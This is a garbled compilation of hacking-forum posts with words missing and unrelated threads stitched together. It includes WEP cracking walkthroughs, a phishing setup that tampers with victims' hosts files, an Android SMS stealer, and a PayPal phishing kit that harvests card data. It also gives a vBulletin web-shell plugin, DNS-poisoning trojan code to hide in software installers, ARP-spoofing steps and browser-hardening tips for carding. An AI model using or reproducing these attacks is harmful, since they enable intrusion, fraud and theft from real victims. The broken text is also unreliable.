enjoy happy thank you for the share hope its not another poorly packed malware. 
update added small features optimized code cleared added version for mail writing jabber tune. 
merci mon frere merci. 
cookiecatcher built for lamp stack running the following. 
sagar wrote will try. 
thank you interested see this really works. 
universal steam software amfi. 
codefire wrote wireless hacking cracking wep wpa key via wifite tutorial neo jaguar guys this bro jaguar. 
today gonna show you how break wifi wep wpa key using wifite. 
lets start the game. 
terminal and type desktop step. 
type wget url wifite downloading link step. 
starting wifite gui mod. 
select your network interface. 
select your encryptn type wep wpa and wep wpa. 
set dictionary path pentest passwords wordlists darkc. 
lst then press starting attack automatically. 
after min wep password successfully cracked thanks for visiting this site. 
hope you enjoy the game. 
connect with facebook url skype iam thegame logout neo watch live tutorial youtube video youtube zsdkuilvak. 
com watch zsdkuilvak video. 
wow good this butiful sorry englih bad. 
nevertheless you can't give people like idiot yet lol it's detectable avs you need crypter you kind find lots here this forum try customize change icon bind make something clever yet simple it's the end have fun now and took hour and half make this will take you sec say thanks don't shy there okay. 
multi vuln checker description code made for admins scan the own website for this software can not hack websites will just scan for. 
lean back one click will automatically check for sql injection xss etc passwd mostly used hackers why waiting minutes scans multi vuln checker ist faster you can see. 
shows all activities with injection methods live you can follow all steps. 
put your website url click fast url scan deep. 
click send multi vuln checker send the url there. 
click check all sqli xss etc passwd wait minutes that's very fast and very effective. 
features code one click aio automatically checks for sqli xss etc passwd file vulnerability single check function for sql injection vulnerability single check function for xss vulnerability single check function for etc passwd file vulnerability. 
fast url scan find all urls. 
send multi vuln checker. 
check all url for sqli xss etc passwd press del back button delete url use remove button find urls different methods find ids find ips red progressbar loading scanning content green progressbar finished loading scanning content find images find ftp find java scripts base decode and encode function text binary binary text function text hex hex text function octal decimal decimal octal function url decode url encode function vuln cheats regex cheats cmds added custom url regex scanner fast scan very fast scan. 
deep scan deep but fast scan. 
ultra deep scan big website then can take minutes. 
pid dateline cyberseason tor almost undetectable all the anti viruses sweet site gracias. 
the first not android stealer ever created raziel presents razstealer. 
rpdte hide reply whats new you can now enable the feature auto start the stealer when the phone boots you can now enable the feature delete the zip file after uploading sms thread fixed and optimized sms stealer now includes date and fixed your trying dump tutorial wanna give you. 
codefirelooks good will check this out wrote ransomware threat the rise but the bad news that ransomware campaigns are easier run and now ransomware kit being offered hackers for free for anyone download and distribute the threat. 
keep yourself safe also have excellent article work bro wrote ransomware threat the rise but the bad news that ransomware campaigns are easier run and now ransomware kit being offered hackers for free for anyone download and distribute the threat. 
keep yourself safe also have excellent article. 
this will fun test. 
thanks for this looks sick. 
this seems quite interesting thanks for the share. 
you must reply see links. 
let see the links first. 
plz make visible for thanks. 
good tutorial thanks lot. 
thank for sharing with. 
nice share bro think its working. 
could have acces the hidden content thx. 
document title apple ios. 
merge apps service local bypass vulnerability product service introduction ios previously iphone mobile operating system developed and distributed apple inc. 
originally released for the iphone and ipod touch has been extended support other apple devices such the ipad and apple. 
unlike microsoft windows phone windows and google android apple does not license ios for installation non apple hardware. 
september apple app store contained more than ios applications which have collectively been downloaded more than billion times. 
share the smartphone mobile operating system units shipped the third quarter behind only google android. 
june accounted for mobile web data consumption including use both the ipod touch and the ipad. 
the half there were million devices activated. 
according the special media event held apple september million devices have been sold through june. 
the user interface ios based the concept direct manipulation using multi touch gestures. 
interface control elements consist sliders switches and buttons. 
interaction with the includes gestures such swipe tap pinch and reverse pinch all which have specific definitions within the context the ios operating system and its multi touch interface. 
internal accelerometers are used some applications respond shaking the device one common result the undo command rotating three dimensions one common result switching from portrait landscape mode. 
ios derived from with which shares the darwin foundation. 
ios apple mobile version the operating system used apple computers. 
ios there are four abstraction layers the core layer the core services layer the media layer and the cocoa touch layer. 
the current version the operating system ios. 
the device flash memory for the system partition using roughly that partition varying model for ios itself. 
ios currently runs iphone apple ipod touch and ipad. 
org wiki ios affected product apple product ios mobile device system. 
technical details description local pass code code lock bypass has been discovered the apple iphone ios. 
the vulnerability allows bypass via evade glitch the local pass code service ios compromise the mobile device. 
the local bypass vulnerability located the pass code module the apple ios. 
local attackers with physical access can merge local installed apps and default services via glitch ahead the pass code module the apple iphone device. 
regular the security policy the device disallows merge services ahead the logon screen pass code. 
local attackers without restricted physcial account can merge apps with functions ahead the pass code module compromise the device. 
local attackers with user account can prepare manipulate mobile device access later the restricted context. 
during the tests revealed that the exploitation only possible merge apps ahead pass code when the siri edit command context has been involved save temporarily context. 
the exploitaiton through the glitch was successful the attacker able prepare calls via app write emails access other last used apps compromise the ios device. 
the security risk the local pass code bypass vulnerability estimated medium with cvss common vulnerability scoring system count. 
exploitation the local glitch bypass vulnerability requires privileged web application user account multi user account restricted physical device access without user interaction. 
successful exploitation the local pass code bypass vulnerability results device compromise information leaking. 
affected device apple iphone affected version ios. 
tested device apple iphone ios proof concept poc the local pass code bypass vulnerability can exploited local attackers with privileged device user account without user interaction. 
for security demonstration reproduce the vulnerability follow the provided information and steps below continue. 
manual steps reproduce the issue. 
login your iphone device and update the newst ios version. 
settings code code lock settings and ensure siri service activated service activated default. 
lock the iphone ipad usage the power button slide the the pass code. 
press the siri button seconds and the last second the emergency call button too note the siri opens and the emergency call site the background. 
not allowed use siri the emergency call mask. 
start siri the locked iphone ipad mode. 
use the command open call contact hacker note the contact you call needs more then entries with the same letter saved. 
our tests opens after the command the siri mask and shows the visible contacts the phone with the same name. 
top the mask were the user able edit manually the input the command. 
click edit the input field the siri command top and save the all the input temporarily. 
now press seconds the power button and the third second press also the others contacts button note the contact button allowed the last version access the addressbook but the issue patched yet. 
now hold the home and siri button together and stop holding the power button same time. 
the website with the temp saved content allows move modules ahead the logon mask with represents stable security risk note the policy disallows use any function ahead the pass code lock screen ios devices case scenario during the security test used the new iphone lab member our office verify. 
included the messages face time and mail service front top the ios login mask. 
the local attacker able save through the evil glitch any program which available the phone ahead the login screen pass code module. 
the end made jokes writing messages ahead the phone pass code lock screen module. 
the glitch has been reproduced when the watch the login screen becomes visible all backgrounds the used app. 
and thank for share dude. 
cheers mike lets see. 
color the main drivers for botnets are for recognition and financial gain. 
color botnet lifecycle bot herder configures initial bot parameters such infection vectors payload stealth details register ddns register static bot herder launches seeds new bot bots spread causes increase ddos being sent the victim losing bots rival botnets color types attacks denial service attacks where multiple systems autonomously access single internet system service way that appears legitimate but much more frequently than normal use and cause the system become busy. 
let try live accounts. 
you already know that you want lock down your network you should opt for wpa encryption because wep easy crack. 
but did you know how easy take look. 
note this post demonstrates how crack wep passwords older and less often used network security protocol. 
the network you want crack using the more popular wpa encryption see our guide cracking network's wpa password with reaver instead. 
today we're going run down step step how crack network with wep security turned. 
but first word knowledge power but power doesn't mean you should jerk anything illegal. 
knowing how pick lock doesn't make you thief. 
consider this post educational proof concept intellectual exercise. 
dozens tutorials how crack wep are already all over the internet using this method. 
this ain't what you'd call news. 
but what surprising that someone like with minimal networking experience can get this done with free software and cheap adapter. 
what you'll need unless you're computer security and networking ninja chances are you don't have all the tools hand get this job done. 
here's what you'll need compatible wireless adapter this the biggest requirement. 
you'll need wireless adapter that's capable packet injection and chances are the one your computer not. 
after consulting with friendly neighborhood security expert purchased alfa awus usb adapter pictured here and set back about amazon. 
update don't what did. 
get the alfa awus not the instead. 
the guy this video below using model bought ebay and even selling his router choice. 
there are plenty resources getting aircrack compatible adapters out there. 
already took you full screenshot tour how install and use backtrack the linux live that lets you all sorts security testing and tasks. 
download yourself copy the and burn load vmware get started. 
nearby wep enabled network. 
the signal should strong and ideally people are using connecting and disconnecting their devices from. 
the more use gets while you collect the data you need run your crack the better your chances success. 
patience with the command line. 
this ten step process that requires typing long arcane commands and waiting around for your card collect data order crack the password. 
like the doctor said the short person little patient. 
crack that wep crack wep you'll need launch konsole backtrack's built command line. 
it's right there the taskbar the lower left corner second button the right. 
first run the following get list your network interfaces airmon the only one i've got there labeled. 
yours may different take note the label and write down. 
from here substitute everywhere command includes interface. 
now run the following four commands. 
see the output that got for them the screenshot below. 
color airmon stop interface ifconfig interface down macchanger mac interface airmon start interface color you don't get the same results from these commands pictured here most likely your network adapter won't work with this particular crack. 
you you've successfully faked new mac address your network interface. 
now it's time pick your network. 
run airodump interface see list wireless networks around you. 
when you see the one you want hit ctrl stop the list. 
highlight the row pertaining the network interest and take note two things its bssid and its channel the column labeled pictured below. 
obviously the network you want crack should have wep encryption the enc column not wpa anything else. 
like said hit ctrl stop this listing. 
had this once twice find the network was looking for. 
once you've got highlight the bssid and copy your clipboard for reuse the upcoming commands. 
now we're going watch what's going with that network you chose and capture that information file. 
run airodump channel file name bssid bssid interface where channel your network's channel and bssid the bssid you just copied clipboard. 
you can use the shift insert key combination paste into the command. 
enter anything descriptive for file name. 
chose yoyo which the network's name i'm cracking. 
you'll get output like what's the window the background pictured below. 
open new konsole window the foreground and enter this command aireplay bssid essid interface here the essid the access point's ssid name which case yoyo. 
what you want get after this command the reassuring association successful message with that smiley face. 
now it's time for aireplay bssid interface here we're creating router traffic capture more throughput faster speed our crack. 
after few minutes that front window will start going crazy with read write packets. 
also was unable surf the web with the yoyo network separate computer while this was going. 
here's the part where you might have grab yourself cup coffee take walk. 
basically you want wait until enough data has been collected run your crack. 
watch the number the data column you want above. 
pictured below it's only. 
depending the power your network mine inexplicably low that screenshot even though the yoyo was the same room adapter this process could take some time. 
wait until that data goes over though because the crack won't work doesn't. 
fact you may need more than though that seems working threshold for many. 
once you've collected enough data it's the moment truth. 
launch third konsole window and run the following crack that data you've collected aircrack bssid file name. 
cap here the filename should whatever you entered above for file name. 
you can browse your home directory see it's the one with. 
you didn't get enough data aircrack will fail and tell you try again with more. 
succeeds will look like this the wep key appears next key found. 
drop the colons and enter log onto the network. 
problems along the way with this article set out prove that cracking wep relatively easy process for someone determined and willing get the hardware and software going. 
still think that's true but unlike the guy the video below had several difficulties along the way. 
fact you'll notice that the last screenshot there doesn't look like the others it's because it's not mine. 
even though the which was cracking was own and the same room alfa the power reading the signal was always around and the data collection was very slow and backtrack would consistently crash before was complete. 
after about half dozen attempts and trying backtrack both mac and live and virtual machine still haven't captured enough data for aircrack decrypt the key. 
while this process easy theory your mileage may vary depending your hardware proximity the point and the way the planets are aligned. 
yeah and you're deadline murphy's law almost guarantees won't work you're deadline. 
see the video version these exact instructions check out this dude's youtube video. 
video youtube kdd pjiq. 
com watch kdd pjiq feature player embedded video got any experience with the wep cracking courtesy backtrack what you have say about give the comments. 
cool thanks for posting i'll give. 
will attempt using tonight. 
thx for share bro. 
thank you good share. 
friends you may have known about how create phishing web page. 
you don't know about phishing web page you need read this tutorials first how create fake phishing web page once you know the basics phishing web page come this post. 
requirements wamp server install winrar friends there's one drawback our traditional phishing web page method. 
you know what you are right the url our phishing web page. 
may look like the real one but not. 
for may create the phishing web page with. 
com but it's not all same. 
com probably the experienced internet users will notice the url web page. 
they won't fall our fishnet. 
what are going now why should not make the phishing web page's url looks exactly same the real domain name you may ask possible. 
answer yes you can. 
how are going implement are going send email with executable victim. 
the victim double click the executable file then you are done. 
now whenever the victim enter the real domain name like. 
com will our phishing web page. 
don't worry the domain name original url like. 
you may ask how this done ahead. 
how done executable file will change the host file victim system. 
what host file the host file contains domain name and address associated with them. 
your host file will this path windows system drivers etc whenever enter the domain name url for. 
com query will send the dns domain name server. 
this dns connect the address which associated with the domain name. 
but before this done the host file our system will check for the address associated with the domain name. 
suppose make entry with domain name and address our phishing web page for. 
then there's query will send the dns. 
will automatically connect the address associated with the domain name. 
this will fruitful for mask the phishing web page's url with original domain name. 
now let's divide into the implementation you are hosting some other hosting site probably you won't get the unique address for your phishing web page. 
you can have the address the hosting only. 
you try use that address the victim will not bring your phishing web page they will bring the hosting address. 
what you can overcome this problem you need set your own webserver home. 
using webserver softwares you can set your own hosting service. 
your computer should turned always. 
because you turned off the computer then probably host will not online. 
again will available when you turned. 
your computer turned when victim visits your site. 
how set your own server download the webserver softwares like wamp xamp both are open source software meant they are free. 
downlad the wamp server from. 
com install the wamp server. 
requirements for crack wifi password android rooted android mobile nearby wifi with wps abailable tgdrt features this wifi cracker apk cracking any wep wpa and wpa wifi wps available faster method took only seconds much more. 
nice tutorial dude keep. 
thank's for the share testing and don't work. 
thank you for the help. 
would certainly like check these out. 
thank you much hope this works. 
thank you for sharing but link dead. 
thank you for the share sent from iphone using tapatalk bond benz wrote download rep don't forget thanks sent from iphone using tapatalk. 
why not strong bot and wtf dont upload sites with all that garbage. 
swapnil haxor wrote como assistir deos youtube para only sem ter uma conta. 
primeiro lugar precisamos link para deo. 
por exemplo vou estar usando este agora seguinte moral hist ria como final link deo youtube basta adicionar digo voc ser capaz. 
nice one let try give trrial backdoorerd tho. 
wanna learn more about this thank you man. 
test the site vulnerable change the url hidden content you must reply see links upload images your images will stored the product images uploaded images directory. 
wireless hacking cracking wep wpa key via wifite tutorial neo jaguar guys this bro jaguar. 
type wget hidden content you must reply see links wifite downloading link step. 
connect with facebook hidden content. 
very nice post dude. 
may see this please. 
hope this helps some you guys. 
lets see what beholds. 
shell upload vulnerability pydio ajaxplorer. 
background pydio allows you instantly turn any server into powerful file sharing platform. 
formerly known ajaxplorer description vulnerability there unrestricted upload capability one the plugins that distributed with pydio. 
attacker may use this vulnerability upload arbitrary files location that attacker can control and will allow remote code execution the server. 
exploiting this vulnerability does not require authentication. 
zoho agent save zoho. 
php the uploaded file through files save zoho. 
php will moved path that the user can control with the format parameter passed from the user. 
because the file formats allowed are not restricted and also used move path this can used upload arbitrary files the server. 
cve the common and exposures cve project has assigned cve this issue. 
this candidate for inclusion the cve list. 
vendor response upgrade pydio. 
pydio core timeline october vulnerability identified october vendor notified october patch released november disclosure research craig arendt redfsec. 
thanks lott for this tool. 
thank you very much for this mate thank you very much for this mate. 
nice man going try now. 
will try still working. 
this trill good looks man. 
you must reply see links there you. 
here's method personally use make own private socks proxies. 
say thanks you find useful. 
enjoy don't douche say thank you below you find the method useful remove the symbol before the commands you are copy and pasting requirements. 
vps virtual private server you can buy these tons locations. 
buy the cheapest vps they offer. 
most for few dollars per vps. 
exe open putty and put the vps the host name box. 
will say something about keys just say yes the prompt. 
login using the username and password given your vps provider user will root. 
run the following commands below. 
remember not use the sign any the commands install dependencies debian ubuntu apt get update apt get upgrade apt get install build essential automake make gcc nano wget centos yum update yum upgrade yum install make automake gcc gcc gcc nano wget installation wget. 
configure prefix usr local kingate make make install configuration edit nano usr local kingate etc kingate. 
conf scroll down and find these lines and change them socks off erase off and type socks port choose whatever port you would like press ctrl press ctrl button and together then press. 
press enter save the file and exit nano. 
manage this script wget. 
net proxy kingate kingate. 
kingate chmod etc init. 
kingate service iptables save service iptables stop chkconfig iptables off run etc init. 
kingate start open your browser and set proxy manual proxy configuration. 
this under options advanced connection settings. 
then place your vps the first field and the port the port you specified earlier kingate. 
conf click save settings. 
enjoy your new socks private proxy. 
paypal scam new features indetectable anti bot this scam allow you get full victims info logins email password personal information full name date birth billing address credit card card number exp cvv secure password bank details account number password download link how use upload paypal. 
download you can make your own paypal letters you can code with html. 
happy new year all ihf members dance this small new year gift all ihf members. 
regards pratham ihf admin. 
juniorboyu wrote thank you for sharing thanks mate. 
lets how this works. 
net images smilies agree. 
edit but account has been suspended. 
enix wrote the file longer exists here url. 
thank you thank you thank you thank you thank you thank you thank you. 
let see that does work. 
thanks much its working. 
result mysql query query whmcsmysql and download exploit from following link exploit python hide. 
nrvcuycy hide exploit php hide. 
mykggsjt suj vmiqdwf mpqd gpnasore hide register new user target whmcs install register. 
thanks will fun abuse. 
let try maim bahar jara. 
this tutorial how shell all versions vbulletin. 
admincp plugins ajax complete title call whatever execution order plugin php code php code code system get 'cmd' ajax. 
php cmd please bare mind system disabled you have shell exec. 
exec eval etc etc. 
very good bypass code php code code. 
php uqbzpjxn' file put contents 'newpost. 
php' def echo 'done'. 
thanks man got take look. 
blink use your own risk blink cracked just saying that this very badly coded rat the biggest skid this world that xillux. 
reply and see downloading link hide reply. 
codefire wrote note run ettercap your android device root access required. 
installing ettercap first download ettercap files here this zip file includes ettercap for android arp script and root explorer. 
extract all files your sdcard. 
install root explorer open rootexplorer. 
open root explorer and navigate sdcard ettercap. 
use multi select copy the ettercap files. 
data and create new folder ettercap. 
paste the ettercap files inside this folder. 
long click every file inside this ettercap folder and change permissions order execute ettercap install terminal emultator search play store. 
running ettercap you want poison all the hosts inside your network you can use script run arp attacks etter. 
dns configured redirect all conections google. 
com read the final note. 
open terminal emulator and write code sdcard ettercap. 
you want use other options open terminal emulator and write code data ettercap. 
ettercap options note this can useful redirect your victims your server and perform some attacks. 
use root explorer edit data ettercap etter. 
dns and replace google. 
com you can also use address. 
lol open rar file see password comment. 
comment see the content the post. 
introduction chaining socks with proxychains proxifier means forfeiting the protection torbutton which leaves you open browser fingerprinting. 
set everything you would the point entering card details enable javascript allow noscript then run test. 
info just cancel the pop. 
you might get nasty surprise some the info your browser leaking. 
admittedly some bit alarmist they trying sell product after all but some are genuine concern particularly you trying card the same site few times. 
tend use one browser regular firefox for only chaining proxies and have found the following adjustments helpful. 
please feel free add the list. 
com also useful check for mismatches about config geo. 
uri leave blank network. 
default text html application xhtml xml application xml. 
use cache false network. 
max persistent connections per proxy network. 
socks remote dns true network. 
external false set the default and all the subsettings false network. 
warn external true set the default and all the subsettings true network. 
prefetch next false browser. 
use document fonts intl. 
cache iso windows windows iso utf dom. 
enabled false other settings disable all plugins tools addons plugins disable all live bookmarks bookmarks bookmarks toolbar click latest headlines delete disable all updates tools options advanced update enable not track feature tools options privacy enable private browsing configure remember nothing disable party cookies. 
tools options privacy useful add ons betterprivacy close forget ghostery modify headers noscript refcontrol user agent switcher. 
wsoso password for file tacoz sure smack that wrote hey guys finally releasing own hack pack there lots stuff this big pack enjoy download. 
wibr application for testing security the wpa wpa psk wifi networks. 
attachment password password for zip hidden content you must reply see links. 
thanks for this script bro needed this. 
hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links. 
lets see how well this one works. 
let's see what's leaked. 
thx hide reply hide reply. 
hat works its the shit. 
thanks man can use this. 
thanks this big help. 
cheers mike table will test thanks. 
wifite downloading link step. 
skype iam thegame logout neo download full video tutorial here code. 
html watch live tutorial youtube video youtube zsdkuilvak. 
thanks you share tutorial. 
what kind website torrent website average uniques per month average pageviews per month does the site generate revenue yes using popads. 
net selling reason becausedon't have time. 
org almost and half year old site use this domain public torrent site use public torrent script. 
this brandable domain name you can use this any kind business this website has over backlink. 
included with this domain. 
facebook page with all facebook fan likes. 
with more domain torrentmafia. 
are using vps server altushost with whm secured panel. 
expires february you can use this domain technology website brandable website gaming website online store many more use starting bid payment methods western union perfect money pyaza escrow contact torrentmafia yahoo. 
com skype iam thegame. 
thank you body it's realy intresting tool. 
note run ettercap your android device root access required. 
installing ettercap first download ettercap files here files. 
zip this zip file includes ettercap for android arp script and root explorer. 
thanks for info and builder panel. 
tks for the code. 
nice tut thanks dude. 
nice tryin hard protect coordonates. 
thanks for the share was very useful pkingrock wrote thanks for the share was very useful page not found. 
realy helped want share. 
thank you hopefully newb friendly. 
still don't have access. 
added new tool fake router which gives more control options added new tool dnsrevenum which reverse enumerates the dns added new tool inverse lookup which gets the ipv addresses mac address added new tool fake solicitate which lets you fake neighbor solicate packets added new tool address converts between ipv ipv and mac addresses added new tool passive discovery which detects all sending systems and includes dad detection dnsdic added full srv service scan support option fix for systems thanks alphacc altern dot org some more minor fixes thcping added udp option return code reply reply error reply added tcp port the with tstamp mss wscale options return code tests done and target alive target crashed detect new now the interface passed cmdline option the script implementation added more tests esp ping tests exthdr exthdr size fixes for some tests returns errors least one reply only error replies parasite fixed crash when and were used together parasite now terminates should also ending childrens when using fixed the mac command line parameter that was not working trace fixed crash made bit faster fix for targets further away than hops enhanced error messages kill router fixed target option dos new also doses non link local addresses now toobig fixed crash when mtu size specified was send errors dont result program exits for flood and ndpexhaust tools anymore thc ipv lib changed the thc pcap function have addition parameter promisc before was not promiscous reduce cpu load which affects detect new dos new and parasite changed some function defines from signed unsigned cleaned the code download thc ipv. 
isp couldn't help xbox couldn't help microsoft couldn't help other forums couldn't and etc. 
will someone please jump teamviewer something and help finish setting vpn for xbl. 
i'm pretty sure i've got most done. 
wrote iis exploit website hacking windows steps color computer right cilck and select add network location click next click next now enther the url vulnerable website and click next for example take this site. 
com click next button now click finish see network location option and click website folder now download the shell after downloading right click file and click extract here now copy the power. 
jpg now click edit file index. 
asp and click save now you wil get page which will show that the page defaced you've done now whn will open that website you will got your deface page home color reading this cool cool hlp bro. 
clg website are also iis server but didnt tht when try add network its shows error dash. 
thanks bro look good. 
color ahead read this thread think should read the basics dns poising. 
tht will easier understand this thread. 
for reading the basic things and understandin goto. 
poisining following post dns poisoning which internet dns poisoning also known remote dns poisoning. 
this type dns poisoning can done over single multiple victims and matter where your victim world the primary dns entries his her system can poisoned using this method. 
for this type dns poisoning attack you'll have setup rouge dns server somewhere with static address and please note that should working condition. 
methods poisoning are different for windows and linux systems but happens with help same entity that trojan file. 
here 'll show you how create dns poisoning trojans all you have vector them. 
for windows for poisoning dns victim you must know name his her interface name she has set for his her internet connection. 
this condition must for you poison victim's dns you don't know their values then use default local area connection. 
now lets create dns spoofing trojan batch file. 
type following lines notepad and save with any name and. 
netsh interface set dns local area connection static. 
above command will set dns server victim. 
you can change local area connection name interface connection you know else always with default. 
now send that file victim for poisoning his her dns entries. 
you don't want send bat file because your victim might suspect then you can create executable file compiling following program. 
int main char str netsh interface set dns local area connection static. 
system str return color for linux and unix linux and unix systems save dns entries etc resolv. 
conf folder changing entries this file can help you poison dns linux and unix systems. 
now get address working dns server and address rouge dns server set you. 
suppose address rouge dns. 
and real dns server. 
then type following commands text file and save with. 
extension for example change. 
conf color color now all you have vector this file victim. 
for vectoring get any source code installation package from internet interesting software your victim can't deny install his her system. 
extract and find shell script place change. 
that folder open target shell script text editor and before ends type following commands chmod change. 
pack again and send your victim for installation once she installs software from your source code she will infected. 
now sometimes its difficult find shell script package but what not difficult find source file. 
you get problem with above method find source file with several functions and create following new function. 
color color void change char str str echo nameserver. 
conf system str str echo nameserver. 
conf system str return color color and call this function any other function before returns something. 
pack files again and send your victim your file will execute every time when your victim will launch that program. 
now note that above exploits codes are really very basic you can modify them according your needs and you think they are difficult understand please get your hands programming even you can understand basic programming you can write your own exploit codes. 
all sorry for spelling and gramatical mistakes english not native language from costa rica. 
didnt know where post this feel free move. 
asked this different forums some people reply but going put only what answer them order make the post more small. 
having situation here and was wondering someone with experience this topic can guide and explain exactly whats going. 
the beggining never pay attention care about but recently has become extremely obvious. 
what happend that everything the internet being watched monitor constantly know that goverments isp nsa big brothers etc constantly monitor what normal citizens the internet that include emails chats basically everything. 
does not matter you use linux hardened grsecurity with more secure options selected apparmor virtualbox vmware tails live dvd liberte live dnscrypt whonix proxy vpn tor installed tor browser bundle tor vpn same time java disabled adobe flash plugin disabled using only fastest stable trust tor servers hardware firewall nat. 
this experience from years study this kind topics searching the internet and getting certified things like ccna cisco. 
looks like this person group that doing this just need some kind man the middle attack all internet traffic encrypted not proxy vpn both the same time does not matter they can read and see all internet traffic without problems. 
they also not need hack put virus rootkit zero day vulnerability etc. 
they not need compromise all. 
now not expert but not begginer either suppose intermediate level. 
now doing this kind thing regular citizins good bad invansion privacy and violation human rights not concern right now. 
more interested knowing exactly wich institution group person famous have record for doing this kind things. 
everything the internet being watched and monitor but does not end there. 
cable isp company offers like channels nothing fancy like direct. 
turn and this where the massive media lies manipulation insults threats blackmailing brain washing ridiculies intimidation start against purpuse. 
why have idea not terrorist dont anything illegal the internet dont represent treat the united states basically nobody. 
reading and studying the internet try better person and someone that brings education society crime than guilty. 
just regular middle class guy. 
can mention name hundreds examples record over the years but going name few you can see whats going. 
the first impression this its just coincidence but repeats over and over and over every seconds day after day year after year its longer coincidence and what you got its super obvious pattern how someone group people has something against and really hate. 
let say put youtube song enya and turn the and put warner brothers and the are presenting episode comedy friends and the background you can hear song enya. 
let say thats coincidence right. 
immediatly google search engine and search pictures mahatma gandhi start through diferent channels and seconds later channel sony they are presenting the comedy seinfield and elaine does commentary about mahatma gandhi imediatly youtube and search for obama seconds later another channel appears obama campaing propaganda. 
imediatly search for scientology religion minute later channel presenting something about scientology. 
imediatly search youtube for chess seconds later channel fox they put the movie men exactly the part where magneto say chess the pawns first. 
imediatly search for father barron's youtube minute later one the religion channels they are presenting father barron's. 
imediatly search google pictures giraffe seconds later they are presenting giraffe one the channels. 
imediatly put youtube pink floyd song minute seconds later their are presenting pink floyd concert. 
imediatly put warner channel they put commercial guy saying just big coincidence. 
imediatly put sony channel another commercial and women sais what are you going sue lawsuit. 
imediatly put ruth parasol google images seconds later there channel presenting saturday night life with women dressed with black dress the ones that use the judges court and laughing and doing weird faces. 
case you dont know who ruth parasol she the coufounder party poker fraud scam website she lawyer and crook. 
imediatly search youtube for charles manson minute later channel presenting something about charles manson. 
imediatly search youtube for atheists seconds later there channel presenting something about atheists. 
and this continous over and over and over everytime try watch something the very annoying. 
does somebody knows how can stop this kind man the middle attack against just need know which group exactly more likely commiting doing this type crime against regular middle class citizens. 
pretty shure that this most happening millions people around the world. 
cant look google because dont know how this kind crime called. 
the groups institutions that see involved this attack against are just need know wich one more likely have record famous have been caught doing this types crimes. 
the isp that provides the internet isp costa rica its isp located the united states think florida something like that not shure. 
this topology costa rica isp costa rica goverment united states isp united states goverment and media would really appreciate someone who knows about this topic can help and guide order bring some light and true regarding this situation. 
thanks for your reply dont know how you cant see the pattern that something fishy the math and statistics something like that happening over and over year after year and you will see the super obvious pattern some one constantly manipulating and adjusting the programming purpose according what searching the internet real time. 
regarding tor yes already use live dvd tails that send all traffic through tor network with leaks the same with virtual machines whonix same result they will able see internet traffic real time. 
same for tor browser bundle with this torrc configuration. 
using default torrc configuration with tight grsecurity kernel with apparmor profile for tor browser bundle behind cisco pix nat private network allowing only outgoing connections. 
now not saying that tor does not what advertises same for vpn free paid versions openvpn encrypted vpn tunnel ssl cas etc. 
dont use pptp know vulnerable. 
case seems that they not need decrypt the traffic that would probably takes lots time and huge effort. 
they prefer more practical and easy way like said before some kind man the middle attack where they dont need decrypt the traffic now this not hacker from any part the world. 
someone who has access the servers routers switch firewalls accounts the isp's involved this issue and basically knows lot about where live who who family etc. 
someone who can say isp hey need have full access and full internet survileance customer that you guys have even that person not doing anything illegal the internet and probably law isp would forced does not want get involved legal problems. 
something like inside corrupted worker isp costa rica the isp that offers the service isp costa rica which shure from united states yes like you said probably from california who has the tools the programs the keys the passwords the time the budget the technical skills the knowlgment who able this kind things. 
some type corrupted person from the goverment media isp other agency institution company corporation who been paid and has agenda this type things costa rica citizens and probably all around the world millions people. 
this kind massive monitor and internet surveillance being applied full complete countries citizens like britain china costa rica just mention few obviously there lot more. 
not paranoia here just straight true facts. 
recently bought years subscription like moths ago for. 
net because there was very cheap offering. 
and really like the idea tor over vpn logs option they offer. 
use their service any flavor just proxy just vpn and proxy tor vpn same time same results theys where able see internet traffic and didnt take long. 
tell you the through didnt like their service all tor vpn download speed was around kbps was insanely slow. 
have cable download speed connection provided isp. 
you can say well that because tor super slow network well yes and you choose the more fast stable servers you can get decent speed. 
with the vpn servers was the same story super slow paid vpns are suppose fast not mention that just few servers connect. 
the beggining try their service didnt connect all had their chat support and they had configure openvpn server configurations push dns server like google. 
that was another thing the guy who offer support didnt even know what dns server was and only said weak arguments order defend and make look good their company. 
finally they push openvpn dns server. 
told them didnt want use google dns server for privacy issues. 
send them email saying please change their own privatoria dns server. 
better yet dont use dns server all and use only tor dns servers know how use openvpn and linux this was obviously issue their side not mine. 
they never answer email and they havent change the configuration since then. 
got their website ask life support chat they put wait and they never get back after while sign just sais send your issue via email. 
waste around this vpn service. 
here some youtube video links where its being explain detail how all this stuff works just name few. 
com watch wtblir ogco. 
com watch xht tiq xpy. 
com watch ffjsax dghk. 
com watch dansd iukq. 
com watch boe hfel. 
com watch sink fci see what you mean yes here costa rica the programming changes all the time and for speak very dynamic that matter they adjust the programs accordinly your searches and what you watch the internet. 
for example start using tor they presents certain types movies and series and certain types propaganda. 
start using google dns servers they start presenting diferent movies the same series but with diferent episodes and diferent propaganda. 
use isp dns servers again they start presenting diferent things etc. 
use vpn service lets say located romania well they start presenting friends episode where monica mention the horfans romania. 
they start showing propaganda saying that the goverment romania its corrupted. 
very similar what google does how they put advertising according the searches you their search engine. 
its exactly the same thing. 
they will post schedules weeks advance with episodes listed here costa rica will easy see there violation something fishy. 
would give them call their call center and say for example hey monday you where suppose present dont know friends comedy instead mom comedy whats going can speak supervisor manager course they will tell something like reserve the right change our programming whatever see fit matter live none live. 
but even then would still hard for example none live comedy series drama because they are still able chosse wich episode present and wich content. 
unless they post schedules weeks advance exactly wich episode they are going present. 
for example today friday there are going present episode friends where monica got married. 
they present diferent one then something not right very fishy. 
now case there are lot live programs and yes regarding issue its been both live and none live. 
and yes defenetly looks like live operation against home even more live operation against country even more live operation against the world. 
have friends that have the same isp and same cable and service they also have experience the same internet issue. 
the past long time ago when were very young had incedent with private discussion where having via email. 
make long story short someone speak more than should regarding issue. 
guess what the police nock the door some friends had and the situation went very ugly. 
the end was just. 
but was very obvious that they were intercepting and monitoring what were doing the internet. 
they were reading our emails real time. 
and ssl and email passwords did not protect all. 
could all this tracking you see purely web based thanks web tracking flash tracking and supercookies your isp might inserting supercookies answer dont think use tails without usb hard drive connected when use the tails. 
ever own unless this two are vulnerable this kind attacks. 
that case could posibility. 
pick your tor exit nodes carefully. 
the mitm happening one these places answer your system the exit node after the exit node though tails tor browser bundle build properly connect the tor network and avoid this type mitm atacks unless this two are vulnerable this kind attack. 
you move the exit node around between non cooperative countries russia usa and still see what you claim then the problem your box the there answer yes move the exit node around between non cooperative countries russia usa and still have the issue. 
what you mean box what there have been documented cases cisco gear being modified governments during shipping answer yes aware this one. 
